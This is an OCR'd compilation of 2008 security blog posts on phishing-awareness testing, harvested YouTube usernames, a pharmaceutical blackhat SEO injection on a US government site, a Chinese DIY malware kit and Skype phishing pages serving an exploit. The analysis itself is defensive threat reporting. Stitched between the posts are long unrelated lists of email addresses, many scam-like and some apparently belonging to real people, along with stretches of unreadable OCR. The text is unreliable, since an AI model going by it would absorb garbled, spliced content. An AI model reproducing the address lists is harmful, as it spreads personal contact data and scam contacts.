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[5]Web Site Defacement Groups Going Phishing 
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[11]Inside a Botnet’s Phishing Activities 

[12]Large Scale MySpace Phishing Attack 
[13]Update on the MySpace Phishing Campaign 
[14]MySpace Phishers Now Targeting Facebook 
[15]DIY Phishing Kits 

[16]DIY Phishing Kit Goes 2.0 
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4.5.4 Ethical Phishing to Evaluate Phishing Awareness (2008-05-06 23:26) 


RESPONSE 


EMAIL RESPONSES 300 
Scenario (1): New Laptop 


B® Clicked Link 
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What is the most efficient and cost-effective way of both, measuring your employees aware- 
ness of phishing threats, and building awareness of the threat simultaneously? By sending 
them ethical phishing emails to see which department based on which social engineering 
Campaign is more susceptible to phishing attacks, at least that’s what [1]PhishMe.com is all 
about : 


" Effective, memorable, and secure user awareness testing and training is now available 
with just a few clicks. Using PhishMe.com’s built-in templates and WYSIWYG functionality, you 
can emulate real phishing attacks against your employees within minutes. Focus your training 
efforts on the most susceptible employees by providing immediate feedback to anyone that 
falls victim to these exercises. Phish your employees before hackers do! " 


Once watching the [2]demo online, you'll get the feeling that it’s actually a real phisher’s web 
interface to spamming out phishing emails, so | guess the bad guys can in fact learn from the 
good guys standardizing approach and metrics mentality applied. 


For the time being, [3]Rock Phish represents the most [4]efficiency centered phishing 
approach, with a single IP hosting numerous domains, each of those hosting over ten different 
phishing campaigns on average each of these with a dedicated cybersquatted subdomain. 
However, with the ongoing [5]commoditization of phishing pages, the [6]localization and 
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segmentation of phishing campaigns, the next logical development would be the public 
release of a point’n’ click web interface for managing real phishing campaigns. 


Or perhaps a public leak, given that someone out there might have already came up 
with such an interface, without the sexy layout? And by the time there hasn’t been a release 
or a leak, spamming tools would continue getting adapted for phishing purposes, and log 
parsers would be a phisher’s best friend in respect to evaluating the success rate of a phishing 
campaign. 


/ 

. http: //phishme.com/demo.htm 
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Ms.melissa-aiden@worker.com 
mr.mark _wailersO77@inmail24.com 
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brainwalker payout@hotmail.com 
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4.5.5 Harvesting YouTube Usernames for Spamming (2008-05-07 08:50) 


sStokesdotcom 


Rhymes ayers 
Sizedkuriboh 


With a recently distributed database of several thousand YouTube user names, spammers con- 
tinue trying to demonstrate their interest in establishing as many contact points with potential 
receipts of their message, or even malware given the harvested user names database ends 
up in someone else’s hands. 


Building such "hitlists" of end points to be spammed, or served malware, is setting up 
the foundations for the success of popular tools used for spamming video and social net- 
working sites, efficiently, and with a very low degree of unsuccessful attempts to deliver the 
message. Moreover, these developments seem to indicate an emerging trend of building 
databases that would later one be efficiently abused, starting from the [1]Thousands of IM 
Screen Names in the Wild uncovered in October, 2007, and going to the [2]spamming of Skype 
users. 
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Info@rasgascoy.com 
panfordpriscilla@ymail.com 
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majorcharlesanderson901@hotmail.com 
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info@exxo.com 
Worldhackers79@gmail.com 
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lexxjones2016@gmail.com 
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jenetm.joe@gmail.com 
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mark.terry202@gmail.com 
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roseudo322@gmail.com 
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michealnorrisjohn@outlook.com 
aliafelicia2@gmail.com 
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larrysmithcares@yahoo.com 
mrstden0012@gmail.com 
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smithadams34@gmail.com 
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beaudrey5@gmail.com 
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patrick4u00@yahoo.com 
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jenniferawal0@yahoo.com 
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grahamwest001@yahoo.com 
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Direct applicability for soamming and malware campaigns, or a bargain for finalizing a 
deal, databases of any kind are prone to be abused in principle, and it’s malicious parties in 
general I’m refering to in this case. 


1. http: //ddanchev. blogspot .com/2007/10/thousands- of -im-screen-names-in-wild.html 
2. http: //ddanchev. blogspot .com/2008/04/skype-spamming-tool-in-wild.htm 


4.5.6 Blackhat SEO Campaign at The Millennium Challenge Corporation 
(2008-05-07 09:47) 


Cams > Searh Maret for "bey antinw 


MM_XSL Transform errce 
hitp eearch mee gow'search?q=buy 2 Bortine% 2 Border 20vagra h2 BIC lake SIEGE % 

JBC Ate R2IBGEB2IEIC a KIA teeta www tte be nliree phpR2BGERIEICwung% 
WBAsrce Mt tebe ri/nty OG %IBIE Echent= Loutpute Lede Lrurre LGtere Lstart= is net a 
vakd XOML docurert 

Opening and ending tag mismatch: meta line 1 and head Check 199 meta, line 31, column 8 in fe 
Nip search mee gowsearch?q=tuy R2Boriine K2BorderK2Oviag a B2EIC Ade KIBSE % 

PBR AtieS2GIES2GIC s SIBAhrete www tte be niece phpS2HIES2BICwng 
ZEWDarcahwww ttv-tet ely IPG BIEIE Echent= Lovtpue= hai or Leva Lier Esl eet 

AltValue: “ or expected Check tag head, ine 31, colurrn 21 in Sle Nip M/eearch mec gowsearch? 
buy NIBokre KIBerderR2Bnagea hIGICA tle BIGGE KIBIC Atle BIBS BIOTIC as 
WAteete www the bs nine phps2BIER2BICieng BIA sree vhwww the bet nW/hy PG 

BSE Echent= Boutputs Lad or kresere Litere Est t= 

attributes construct error, Check tag head, ine 31, column 21 in fe htip: search mec. gowsearch? 
buy NIJBonkew KIBerderK2Bnaga hIGSCA tle BIEGE KIEIC Atle BIOS BIO ah 
WAbrete www the be nine php S2BGIERIBIC eng BZA srceMiweww thr bet ely JOG 

283E Echent= Bovtpe= Lsdoz Lenser Liters Bat at= 

Couldn) find end of Start Tag body tine 31. Check tag body, ine 31, column 21 in fle 

Ntp search mee gowsearch?q=buy2Boriine %2Border%2Oviag es B2EIC Aah KIBSE 

PBX AtieS2BGIES2BIC 2 H2GA trek www tebe niimic phpS2BGERIGICIng 
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AltValue: “ or expected Check tag head, ine 31, colurrn 42 in Sle http M/tearch mec gowsearch? 
buy NIonkne KIBerderK2Bvagea KIGSCA tie BIEGE KIEIC Atle MINIS BIOTIC as 
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283E Echent= Boutput= Ese Levers Liter Bat at= 

attributes construct error, Check tag head, line 31, column 42 in fle http search mec. gowsearch? 
buy NIokes KIBerderH2Bvagea KIGSCA tle BIEGE KIEIC Mite BIBIE BIEIC ae 
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AltValue: * or‘ expected Check tag tr, ine 31, colurnn 89 in Se Np M/search mee. gowsearch? 
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stributes construct error, Check tag tr, line 31, column 89 in Mle http search mec. gowbearch? 
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Among the very latest victims of a successful blackhat SEO campaign that has managed to 
inject and locally host 1,370 pharmaceutical pages, is the Millennium Challenge Corporation 
( mcc.gov ) - a United States Government corporation designed to work with some of the 
poorest countries in the world. 


The injected pages are loading remote images from what looks like a secondary com- 
promised site, in this case ttv-bit.nl which is a legitimate Dutch table tennis association. 
Compared to previous blackhat SEO campaigns that I’ve assessed in the past taking advan- 
tage of redirection only, the layout of the embedded pages in this one is sticking the remotely 
loading images at the top of the page, and placing the original at the bottom. 
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The campaign’s main URI is ttv-bit.nl/rr/c.php where a redirector is forwarding to cana- 
diandiscountsmeds.com, and these are some of the remotely loading images ttv-bit.nl/rr/s.JPG 
; ttv-bit.nl/rr/l.JPG ; ttv-bit.nl/rr/c.JPG ; ttv-bit.nl/rr/v.JPG 
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Moreover, as in the recent massive SEO poisoning attacks, the referrer is checked, and given 
that the campaign URL is dedicated to mcc.gov only, only mcc.gov referrers are directed to 
the spam pages. These blackhat SEO incidents targeting sites with high page ranks, are either 
the result of the automated process of searching for vulnerable such high page rank-ed sites, 
or direct abuse of purchased access to the already compromised hosts via web shells or web 
backdoors. 
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4.5.7. A Chinese DIY Multi-Feature Malware (2008-05-08 11:29) 


What is the current state of the [1]Chinese IT Underground? Are its participants copycats who 
just [2]localize successful malware kits, and [3]port open source malware to web applications 
in between adding more features within? For the past several years, and more recently 
with the [4Janti CNN attacking campaigns courtesy of Chinese hacktivists and the average 
Internet users, the Chinese IT Underground has demonstrated its self-mobilization capabilities 
and mindset, which when combined with[5] basic principles of unrestricted warfare has the 
potential to outpace any other country’s current cyber warfare capabilities - like it is for the 
time being from a realistic perspective. 
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File(F) Setup(G) Remote(B) Order{O} Hacker Tool(J) System procedures(B) HelpfH) 


Intrusion Trojan 


ne , _ Web Trojan 

xxOXX Sizchirtty Tiere - DDOS Attacks(F1} Ctrl+F 1 
ip Eeunania Super scantF 2) Ctrl+F2 

Intranet and Extranet test(F 3) Ctrl+F3 
Downloaders Trojan(F 4) Ctri+F 4 
Bundled programs(F5) Ctrl+F5 
Icon Extraction{F 6) Ctrl+F6 
Hide system to increase users(F7) Ctrl+F7 
Network speed detection(F8) Ctri+F8 
Network traffic monitoring(F 9) Ctrl+F9 
Website Acquisition(F10) Ctrl+F10 


In people’s information warfare self-mobilization happens consciously, and the anti CNN 
Campaigns perfectly demonstrate this, with an emphasis on how even the non-technical, 
but Internet bandwidth empowered Chinese user can consciously become a [6]part of a 
PuppetNet. And while it may also seem logical that the attacking crowds would already be 
using a well known set of DoS tools, the most recent case demonstrates their capabilities to 
code and release such DoS tools on demand. For instance, excluding a [7]popular in China 
DIY malware with [8]custom DDoS capabilities, the rest of the tools were released for this 
particular campaign. 


Furthermore, in between the [9]average password stealers, and [10]DIY malware drop- 
pers, there are releases going beyond the average tools, which demonstrate a certain degree 
of creativity - like this one. 


Key features : 

- the GUI C &C’s objective is to make it easier to control a large number of infected hosts 
with an interesting option to measure the bandwidth in order to properly allocate it for DDoS 
attacks 

- has a built-in dropping capability for backdooring the already infected hosts through a web 
shell 

- has a built-in dropping capability of several exploits onto the infected hosts in order to use 
the infected hosts as infection vectors, a malicious infrastructure on demand 

- intranet and Internet port scanning 


Scanners result : 13/31 (41.94 %) 
Trojan.Flystudio.Al 
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elka346@yandex.com 
mrpetershawn@aol.com 
agent116@resume-redcross.com 
lucyjson222@hotmail.co.uk 
ukmail2021@zohomail.com 
imfofficialsoffic@outlook.com 
jenniferclinton@rediffmail.com 
barr _dennis@rocketmail.com 
companionbengals@gmail.com 
willlammax52@yahoo.com 
georgemax763@gmail.com 
browngunloanlenders@yahoo.com 
chad.stinsonl04@gmail.com 
bridgetadjeis9@outlook.com 
logistic.onlinetrackingservice@gmail.com 
omnihotel canada _information@yahoo.com 
assistants@shermanstanley.com 
garydoylefamily@gmail.com 
mrdeburrswilliam001@gmail.com 
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western.union86@hotmail.com 
infofepama2@gmail.com 
davidjames _130@yahoo.com 
estherorel@yahoo.com 
stevejoh348@gmail.com 
Il-deskfileOQO@hotmail.com 
brownanthony@capsred.com 
timrayfastloandptl@gmail.com 
alexabliss153@gmail.com 
walshgroupshippinguk@gmail.com 
lendingclubx@gmail.com 
laurapeace0O88@gmail.com 
noraahmed7900@gmail.com 
sgtsandrajones12@gmail.com 
Dickson-dicksondennis47@gmail.com 
zedvancelender@gmail.com 
christopher.melvinO@yahoo.com 
vella@govan-brown.com 
susanmor61@gmail.com 
enoskv001@yahoo.com.hk 
presidentofnigeria58@gmail.com 
insuranceloanhome@gmail.com 
greg701021@yahoo.com 
Charlymadsen@gmail.com 
O08aisha008@att.net 
mrsdewiabdul02@gmail.com 
nigeraiembassy@gmail.com 
marrio.cimarrol@gmail.com 
test@amimeasure.vn 
allitristanunitedgroup@gmail.com 
joy 44u@yahoo.com 

lazaridisk g@yahoo.com 
ana.annastasiya@gmail.com 
frankryan018@gmail.com 
Weenypugs@outlook.com 

14950 


notimast@yahoo.com.sg 
gabiryarichard@yahoo.com 
office.imfclearanceoffice.imf@gmail.com 
rjmperezl10@gmail.com 
jo.de5@aol.com 
suzanne.lammers96@gmail.com 
harrisbrownbarclaysbankuk@yahoo.co.uk 
jerrykloubarlyngessan@gmail.com 
grimesloanfirm01@gmail.com 
petronasoilcarrierseeker@worker.com 
snkem537@yahoo.com 
blessing23good@yahoo.com.sg 
mikepetersonl194@yahoo.com 
gabriel.perry84@yahoo.com 
francis.bryma@yahoo.com 
bakhtiar@ilpmsg.gov.my 
suchorska.marlena85@gmail.com 
lane@balfour-beatty.com 
ron.bullen@aol.com 
Alnaimi-fawazalnaimi51@gmail.com 
cherrish19751@yahoo.com.au 
antoinettebfurlow@gmail.com 
williammorgan554@yahoo.co.uk 
kinearamsni@yahoo.com 
mrgalaxyloanfirm@gmail.com 
noramabou@att.net 

hnlychand _financial@yahoo.com 
sarah _wiliams51@yahoo.com.sg 
heartedlove99@yahoo.com 
donaldcruz123@outlook.com 
m.miller1111@yahoo.com 
jameshaun41@yahoo.com 
godwin4live2000@yahoo.com 
info@safewaytradingllic.net 


mr.kaboreandy@gmail.com 
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zuma.kalul130@gmail.com 
silvamelo52@hotmail.com 
ig.bat86@gmail.com 
lawsonsogava26@gmail.com 
suliatmabou72@yahoo.com 
allen4violetlarge@gmail.com 
bobbydesk01@gmail.com 
ceraredward@yahoo.com 
christopherjames446395@gmail.com 
cs.shopltd@caramail.com 
ing.klaus.Ikw@gmail.com 
lloydsbankonlinetransfer.co.uk@gmail.com 
firstfinancelender@aol.co.uk 
john.england2011@gmail.com 
jackson.david915@yahoo.com 
smithwalter111111111@gmail.com 
jamescoker00132@yahoo.com 
carolinacross@misabueso.com 
DrDana@mowr.gov.iq 
joelsweren20@gmail.com 
scottforlove@yahoo.com 
landlord116@gmail.com 
brian.kent2009@gmail.com 
beneditaabba202@yahoo.com 
tavaresfranckO3@gmail.com 
sandraappiah3@hotmail.com 
fabiana25darblo@yahoo.in 
wcloud0Q000@yahoo.com 
Halifaxbankofficial@fastservice.com 
bensonsmith2010claimagent@gmail.com 
tatianalaurisch52@outlook.com 
wallsbruce27@yahoo.com 
joanna@miugo.net 
lilianwesu@yahoo.com 
leon@robins-morton.com 
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File size : 660659 bytes 


MDS ...: d3bfb06d992b1274a69a479348f39c60 


SHAI ..: bc474a8bea0b4a2a4ad446abf6e3b978elfa79c8 


a a ae ee a ace ced OS: et rks ee ee aaa 
eRe eee com B50 | BRESas: Wi] 
TS Bar es : 
Windows 2000 GBYtindows Xp MYindows 2003 BRHF BB? I 
Mepe: @ sry @ wp @ ce @ icmp @ ice 2583= BET Hse 


ee fib Rall 


Using a DIY malware kit as a dropper of exploits onto infected hosts, who would later on be 
used as infection vectors to increase the botnet’s population is a new approach applied by the 
Chinese underground. In comparrison, following an underground’s lifecycle, the Chinese one 
is still more features-centered compared to the Russian one for instance, where once features 
become a commodity, more emphasis is put into quality assurance and extending the lifecycle 
of the malware by ensuring it remains undetected for as long as possible - the product concept 
vs the rootkit stage. 


. http: //ddanchev. blogspot .com/2007/12/inside- chinese-underground-economy .htm 


ttp://ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 


1 
2 
3: 
4 

5 
6 
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. http://dcs.ics.forth. gr/Activities/papers/2006.puppetnet. extended .pdf 
. http: //asert.arbornetworks .com/2008/04/netbot-attacker-anti-cnn-tool/ 


ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 


. http: //ddanchev. blogspot .com/2007/09/diy-chinese-passwords-stealer.htm 
10. http: //ddanchev.blogspot .com/2007/09/chinese-malware-downloader-in-wild.htm 
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koffilaurent@live.fr 
katealicia57@gmail.com 
grosvenorfinancelimited@gmail.com 
applications@oaklandhomeproperties.com 
chrisedmilsonO6@yahoo.com 
mrs.angela_panderson@yahoo.com 
beatrixbachl121@gmail.com 
richbengals@hotmail.com 
ststeveththompson@hotmail.com 
hermionemergicka@yahoo.de 
dreamingtheright@yahoo.com 
Dudley-swetmangraham2@gmail.com 
lovelysarah@gmail.com 
faithallenl41@gmail.com 

tescobank _veriffication.co.uk@fastservice.com 
zack Williams@engineer.com 
garciajames121@yahoo.com 
Annabelle@googleapp-consult.com 
parcelverified@aim.com 
wynnelorenanne101@gmail.com 
davidmiles9122@gmail.com 
airobnb.rentalsS55@gmail.com 
booking@pay-airbnb.com 
sparker147@yahoo.com 
kennprestont@blumail.org 
ms.presillakouame@gmail.com 
westernunionoffice706@gmail.com 
hosley.j@yahoo.com 
dcw.tradingandbrokers@gmail.com 
barbrahelina@gmail.com 
patrickelvis720@gmail.com 
natashacogold@gmail.com 
unpaidfund4u@hotmail.com 
vanessamarshal1892@gmail.com 


Francisjoel12@hotmail.com 
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manhattanbankcO2@gmail.com 
fanvfk.moritte2005@gmail.com 
revnicholasaka666@gmail.com 
brandonmla37@gmail.com 
career@ampruae.com 
marriotthotelsrecriutdesk@live.com 
wilsonthomas529@gmail.com 
richardmorris _atO1@videobank. it 
mariallovelly@mail.com 
christmum1030@gmail.com 
starmatehusky2007@gmail.com 
sweetlykate31@yahoo.com 
lookingforgoodkate@hotmail.com 
azimb0304@msn.com 
mephon.didierO0199@hotmail.com 
Citychoiceapartment@gmail.com 
lawrence200012@outlook.com 
oliviaguezo@yahoo.ca 
mariavql1@gmail.com 
info@antrackdiplomaticcs.com 
williamsjackson37@gmail.com 
aizamohammed@outlook.com 
online _carelO@yahoo.com 
jessiebelllk@gmail.com 
marie-claude.c@outlook.fr 
clayton.14d@gmail.com 
career.cairnscastle@yandex.com 
stanley.gomado@yahoo.com 
princemfash@gmail.com 
agentkelvinwilliamsO002@gmail.com 
timothyepolk@gmail.com 
financialinfoloan@webmail.co.za 
blessingnice2@gmail.com 
setsg@yahoo.com 


jason.cotwelll138@gmail.com 
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kilikenjer@outlook.com 
wish.dream76@yahoo.com 
zpaki502@msn.com 
mychrisl6@yahoo.com 
grandhotelhrs@socialworker.net 
dnapptrntsl1@gmail.com 
cuteproperty13@yahoo.com 
miribellemiribelle@gmail.com 
web.office.657585@att.net 
mrsbarberatimothy@yahoo.ca 
danoscar9@gmail.com 

don _ken44@yahoo.com 

Harvey Williams@mail.com 
LLoydsBank.uk.co@europe.com 
janabrooks2020@gmail.com 
sami2002sab@yahoo.com 
mancaboza@gmail.com 
clientcare@nationslendinginc.com 
ubabank0264@gmail.com 
overbeckfamily1@hotmail.co.uk 
cynthiaad43@gmail.com 
eleyne.temeyer267@gmx.com 
kone.umon@gmail.com 
nokialotterypromo@ovi.com 
alexjame42@yahoo.com 
dennisbrown437@yahoo.com 
efccunit17@live.com 
kelliebennettl16@gmail.com 
mliansing4u50@yahoo.com 
dr.buckonlinefinancialaidfirm@outlook.com 
victorsavior212@gmail.com 
maelysdaraiche@mail.ee 
collins.bill@btinternet.com 
thom15brt@yahoo.com 


cindymybest@yahoo.com 
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Edward-jamesedward27764@gmail.com 
info _fivestar@globomail.com 
mary _apia82@yahoo.de 
rehbeinr8@gmail.com 
robertopuku35@yahoo.com 
joannrodriguez11100@gmail.com 
gvmrajal1@gmail.com 
mzmeigs1@hotmail.com 
susanwilson@conejousd.org 
opinionoutev@live.com 
mariarosa99533@gmail.com 
wonga.com@admin.in.th 
armydepartmentofleave@usa.com 
eileeng5lhal@gmx.com 
greenfield.investment@rogers.com 
info@johnhenryorg.com 
micwell90@yahoo.com 
carolwilcoxlenders@gmail.com 
angeladawes d@hotmail.com 
martins loanfundsO10@hotmail.com 
interpolpolice3513@gmail.com 
colruyt.group1@outlook.com 
rffinance.fr@gmail.com 
jlee777749@protonmail.com 
evelyn _philip12@yahoo.co.uk 
koshechka00456@pisem.net 

scott _j80@yahoo.com 
jessicawilmers@hotmail.com 
apl121111@gmail.com 
teresamartin345@gmail.com 
WOOD-unitedbankof4@gmail.com 
info@rickinvestment.org 
wincottsam7@gmail.com 

daligan _br@hotmail.com 
chaseblunt40@live.com 
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dr.bellousman63@yahoo.com 
kennethcole63@yahoo.com 
corlosmaxwell@gmail.com 
rbbc@powerbrandsconsulting.net 
terraceglass@bigpond.com 
toddring00188@gmail.com 
lara.bridge@immocez.com 
dr.jamesbryan@yahoo.com 
johnfreedom.gtb0l@gmail.com 
lovekhalifa40@gmail.com 
mysteryshopper1181@gmail.com 
geraldcoleman@xd.ae 
rev _t23@yahoo.com 
hsbc.uk@fastservice.com 
smith _brender@yahoo.com 
richarddare89@yahoo.com 
airbnb-inc@outlook.de 
maxdrpaul211@gmail.com 
RevJamessanchezmatus001@gmail.com 
karinarosia21@gmail.com 
r.wellsl12@yahoo.com 
noble.assist@clix.pt 
Smithmicheal929@yahoo.com 
supermike665@yahoo.com 
indocb@live.com 
jamiearonson5@gmail.com 
rfederalhouseof@gmail.com 
transfer.servicecare@gmail.com 
fishadiol01@gmail.com 
kingsleydike1983@outlook.com 
psanch31@gmail.com 
admin@usOb0000ccc.icewarpcloud.com 
airbnb@automated-booking.com 
UNimfbfouaga@gmx.us 
timothyforeman2k@outlook.com 
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drmrsmaryduke@gmail.com 
yoursbombita@freemailbox.net 
abherbalcures@gmail.com 
lee.asha57@yahoo.com.ph 
markdean024@yahoo.com 
nelsonmota77@yahoo.com 

us costomagent234@mcom.com 
trackingsinformation@consultant.com 
lucaniaberltti@yahoo.com 
visaincorporation@gmx.us 
mr.camila.sakura@hotmail.com 
tn _nguyen22@yahoo.com 
Nicky.richard@mail.com 
stevewaynoil4@gmail.com 
whitetoosky@yahoo.com 
abigailmukazi@hotmail.com 
Dr.binetjohnson@hotmail.com 
hmrevenue002@gmail.com 
dorottya.edmund@gmail.com 
makstee@yahoo.com 
barmikekiyamo@gmail.com 
richesl111@yahoo.com 
ilyu.kucc@yandex.com 
southoilandgase@gmail.com 
heigherlewiss@gmail.com 
fely.frow@mail.com 
monge936@hotmail.com 
mira.origi@gmail.com 
joyce24782@yahoo.com 
tassyand1@yahoo.com 
nucleus@kimo.com 

stella _sami@outlook.com 
jamespaul777@yahoo.com 
jimbruno1959@yahoo.com 
paul edward@barrister.com 
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bestellbestaetigung@transaktion-amazon.de 
jessicacelinel1@yahoo.in 
mrshughes1901@hotmail.com 
ukmanagergregsmith@consultant.com 
lucypaulloaninvestmentcompany7@gmail.com 
loanagentekaterinazhan@gmail.com 
larryhuftyO@gmail.com 
hiltonkatie21@yahoo.com 
thomsoncruise@zoho.com 
cygnetgroup@groupmail.com 
info.dept.org2@gmail.com 
presidente@infosbc.org.br 
humanresource2011@one.co.il 
danielball70@yahoo.com 
parcel2gocouriershippingO0@gmail.com 
erdr.hdm@aol.com 
dukeovie@gmail.com 
mrssophia.robin.75@inbox.ru 
expressbuy.|td@gmail.com 
broks.kelly@gmail.com 
shaabanbouthaina9@gmail.com 
victoriaford12@yahoo.com 
maryhmilton43@gmail.com 
michael@hughey-inspections.com 
tijaniahmedbastawy111@yahoo.com.hk 
jtobi71@gmail.com 
guarantee.loans.firm@gmail.com 
contactcentre _credittrusto@protonmail.com 
ronnfamily@live.com 
guinnessvilla@yahoo.com 
ravenousriley1991@outlook.com 
INGbankonlineservice@consultant.com 
mohamedmafus.mf@gmail.com 
jeanpduchen@yahoo.com 
gicglobal.intIi@aol.com 
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annavirgin32@yahoo.com 
arthurmorison@yahoo.com.ph 
perryomo@yahoo.com 
alfred.gardner10369@gmail.com 
payinvestigationdepartment34@outlook.com 
parkmasunji88@gmail.com 
careers@mirioilgas.com 

coke 66@hotmail.co.uk 
angelaroom77@gmail.com 
anderson _love66@yahoo.com 
wilarthur@carnival-food.com 
aleksanderbdk@aol.com 
monicabensonsmiles@yahoo.com 
homef17@aol.com 

joseph van0@yahoo.com.sg 
yuliikuznetcova28@gmail.com 
francrich _72@yahoo.com 
internationalcricket _promo@yahoo.com 
stegermichaelonline@gmail.com 
p19761966@gmail.com 
bolasmarkuz@gmail.com 
amazingfavor1955@gmail.com 
johnsonmorgan623@outlook.com 
lengon368@aol.com 
harrismorrison@aol.com 
hchristopherd@yahoo.com 
joshua.cham@yahoo.com 
asleytor2@gmail.com 
wellsfffagobank@yandex.com 
cinderellamarcoy@gmail.com 
clarenceshawn91@yahoo.com 
feghgrefegretg@msn.com 
nicholassmithloans@gmail.com 
olegsiegel@gmail.com 
nwbplc41@yahoo.com 
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lenret.financial@lenretfinancialinvestmentlitd.com 
jamal.mattars@gmail.com 
amacorresponding@gmail.com 
hr@wapenergy-inc.com 
drallenantony@gmail.com 
janetmark125@gmail.com 
cindystuartb@comcast.net 
jangonhpanpam@aol.com 
dorothy1973@comcast.net 
elizabethkujo764@yahoo.com 
lindal170@cantv.net 
zara.hassan2121@gmail.com 
rbinvestment1@outlook.com 
wjgarret@hotmail.com 
offerfreshO9@aol.com 
elizabethlisson701@gmail.com 
jerrygodsonl@aol.com 
mrjohnsmith550@gmail.com 
ubaatamdepartmentO1@mail.ee 
marcelotartaro5l@gmail.com 
maina03 _waziri@yahoo.co.uk 
scott kurgan01@live.com 
Noel.Mathias61@outlook.com 
powell.richard35@yahoo.com 
imfcompany60@gmail.com 
brsrras@gmail.com 

tom _smith555@yahoo.com 
marystokeuk1@live.com 
loanofferconsultant@live.com 
maherasfari537@gmail.com 
luisahoff20@gmail.com 
johnmartinsO0012@hotmail.com 
Richardwest11@yahoo.com 
joy.ibrahima@yahoo.com 


tonyadeolal@hotmail.com 
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maksimovaevdokiya59@ryan-paul.com 
jc.mark2012@yahoo.com 
info@destinyyorkiepuppies.us 
tracey@bpnet.co.uk 
currweggorwagg/037727@aol.com 
federalreservebank2003@gmail.com 
gs.financial00l@gmail.com 
gtbbcustomercentrer@hotmail.com 
secretrydesk10@aim.com 
onlinetransfer@representative.com 
antoniajacob770@gmail.com 
iszzyloaninvestment@live.com 
bevernis15@hotmail.com 
mikejonesfc@yahoo.com 
mikejonesfc@hotmail.com 
mercymonoh@gmail.com 
ulrikameirl1@vera.com.uy 
mrjamorgann@gmail.com 
electricalltd.fujitsigeneral@kimo.com 
bradartwood@live.com 
rozie41@gmail.com 
dalegrant290@hotmail.co.uk 
quinate75@gmail.com 
wroland226@gmail.com 
sharas349@gmail.com 
timothywinslow04@gmail.com 
sap.2012@windowslive.com 
woodsusan71@gmail.com 
aanajla@att.net 
mandarinoriental@usa.com 
fidagntdasmith@hotmail.com 
widube@gmail.com 
alicefranklinloanfirmO01@gmail.com 
lililorensy@gmail.com 
careers@thehotelcollections.co.uk 
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4.5.8 Skype Phishing Pages Serving Exploits and Malware (2008-05-09 11:35) 


Al cody ewe Skype? — Help Search 


Download Use Skype Business Shop | Account | 


Sign in 
a You need to sign in with your Skype Name to continue N ew to 
Skype? 
= Name ye fm PF ‘ 
aS Swor Q 
Sign me in 


Have you forgotten your password? 


kype Name 


[ 


Get password 


"Please, don’t update your account information", at least not on recently spammed phishing 
pages which will not only aim at obtaining your accounting data, but will also infect with you 
malware through exploiting MSO06-014. These phishing emails are a great example of blended 
threats, and while we’re been witnessing the [l]ongoing consolidation between phishers, 
spammers and malware authors for the last two years, this particular phishing campaign looks 
like a lone gunman operation. 


Original message : " Dear valued skype member: It has come to our attention that your 
skype account informations needs to be updated as part of our continuing commitment to 
protect your account and to reduce the instance of fraud on our website. If you could please 
take 5-10 minutes out of your online experience and update your personal records you will 
not run into any future problems with the online service. However, failure to update your 
records will result in account suspension. Please update your records on or before May 11, 
2008. you are requested to update your account informations at the following link. To update 
your informations. " 


Phishing URL : alertskype.freehostia.com , which is then forwarding to skypealert.ns8- 
wistee.fr/Secure.skype.com/store/member/login.html/Login.aspx /index/Sky 


pe.Members/index.htmls/ where the malware and the exploit are hosted. 
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nenitawilliams69@yahoo.com.ph 
mrfdghltd@hotmail.com 
davidlucas1965@yahoo.com 
fedex.harryO11@hotmail.com 
Customerservices@chasebankcustomercare.com 
engrmorganphlip@gmail.com 
lottolotto20092@gmail.com 
carlsbergmalaysia37@kimo.com 
dennis shock1960@yahoo.com 
garciadocktorwilliams@yahoo.com 
johnstoresiltd101@gmail.com 
kayleigh mcenanyl08@yahoo.com 
dublinskyhotels@aol.co.uk 
jamesglick50@yahoo.com 
schallsenderlL@gmail.com 
terrylarryloanfirm@gmail.com 
edwin@terexpedia.com 
shawandasturgisrher@hotmail.com 
happy02 207@yahoo.com 
philip.owen91@gmail.com 
mthmopson@yahoo.com 
strydom.strydom@yandex.com 
mellisajoshua@rocketmail.com 
evgeniiayusupova3@gmail.com 
robertsmoorel101@yahoo.com 
martinesdalton2@outlook.fr 
floclamsdept@hotmail.com 
majorgeneraljohn2007@gmail.com 
ingbankcustomer@accountant.com 
derrickbrown@packexpert.biz 
lynnchipmandonnal0@yahoo.com 
peter.11@blumail.org 
usernotice@google.com 
Pavlik.Petr@outlook.com 


sabatrichardprincess@yahoo.com 
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princesssabat2010@att.net 
us@lead-europe-gmbh.com 
johnkelvin239@yahoo.it 
westernaimf.office@gmail.com 
vteraca@gmail.com 
qatarfinancialinvestment@ymail.com 
Kdanko770@gmail.com 
diplomat _ag2011@hotmail.com 
catekaterinal985@gmail.com 
junlz.liao@breadtalk.com 
intoloveO0@gmail.com 
Airbnb.Booking.Service@europe.com 
cfcubaatm.dept@gmail.com 
goughcole936@gmail.com 
air@bnb-express.com 
mrs.marybens@gmail.com 
andrew _williams@lawyer.com 
lindelwashinton@yahoo.com 
musafamhh2019@outlook.com 
revmorriscole102@zing.vn 
adeerson102@gmail.com 
kinglori889@gmail.com 
info@inlandrevservices.com 
angelo@lloydbrazil.com.br 
20121122213403.311220@gmx.com 
skye@quaishmarketing.com 
info@gov.ustarb.org 
reveneuofficebenin@gmail.com 
matosho01@gmail.com 
AnhLePhi@tttcompany.com 
hhdokumaciautos@gmail.com 
harrybenson445@gmail.com 
bckmthh@outlook.com 
alinanaz399@gmail.com 
agroover1068@gmail.com 
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mknight561960@yahoo.com 
fran.lona@generalmail.at 
franslo@ghf.com 
b.pavell963@hotmail.com 
martin.harry200@yahoo.com 
charles _olimado@yahoo.com 
offiice.service@gmail.com 
bain@louis-berger.com 

arnold bombard@yahoo.com 
passmenotlord@gmail.com 
peakston@gmail.com 
yaana.1987@gmail.com 


irinamors2@yahoo.co.uk 


support@customers-airborneexpress.com 


susanjones4good8@gmail.com 
justinfeelfree@yahoo.com 
kaufen@grabyourdeal.de 
ceadams921339@gmail.com 
alibasahO003@gmail.com 
harveystewart951@gmail.com 
sw018628@gmail.com 
survey-savvy@skymail.mn 
carmenray903@yahoo.com 
lovelytina2017@gmail.com 
dishing010@gmail.com 
ruthericnicole@hotmail.com 
shantel1010walt@yahoo.com 
upscompany14@gmail.com 
dakota _belo2007@yahoo.com 
hussain.rashid81@gmail.com 
mogenslykketoft2016@yahoo.com 
danashihtzus@gmail.com 
renate.keilwerth@doctormadrid.com 
randburgcot@gmail.com 


jamespetterd772@gmail.com 
